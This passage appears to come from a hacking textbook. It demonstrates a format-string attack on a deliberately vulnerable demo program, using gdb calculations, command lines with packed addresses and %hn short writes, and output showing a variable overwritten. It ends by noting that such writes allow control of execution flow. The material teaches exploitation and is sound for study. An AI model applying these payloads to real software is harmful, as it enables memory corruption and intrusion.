Graphics Programs Reference
In-Depth Information
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xfd72 - 8
$1 = 64874
(gdb) p 0xbfff - 0xfd72
$2 = -15731
(gdb) p 0x1bfff - 0xfd72
$3 = 49805
(gdb) quit
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08\x96\x97\x04\x08")%64874x%4\
$hn%49805x%5\$hn
The right way to print user-controlled input:
????%64874x%4$hn%49805x%5$hn
The wrong way to print user-controlled input:
b7fe75fc
[*] test_val @ 0x08049794 = -1073742478 0xbffffd72
reader@hacking:~/booksrc $
The preceding example used a similar wraparound method to deal with
the second write of
0xbfff
being less than the first write of
0xfd72
. Using short
writes, the order of the writes doesn't matter, so the first write can be
0xfd72
and the second
0xbfff
, if the two passed addresses are swapped in position.
In the output below, the address
0x08049796
is written to first, and
0x08049794
is
written to second.
(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xfd72 - 0xbfff
$2 = 15731
(gdb) quit
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08\x94\x97\x04\x08")%49143x%4\
$hn%15731x%5\$hn
The right way to print user-controlled input:
????%49143x%4$hn%15731x%5$hn
The wrong way to print user-controlled input:
????
b7fe75fc
[*] test_val @ 0x08049794 = -1073742478 0xbffffd72
r
eader@hacking:~/booksrc $
The ability to overwrite arbitrary memory addresses implies the ability
to control the execution flow of the program. One option is to overwrite
the return address in the most recent stack frame, as was done with the
stack-based overflows. While this is a possible option, there are other targets
that have more predictable memory addresses. The nature of stack-based
overflows only allows the overwrite of the return address, but format strings
provide the ability to overwrite any memory address, which creates other
possibilities.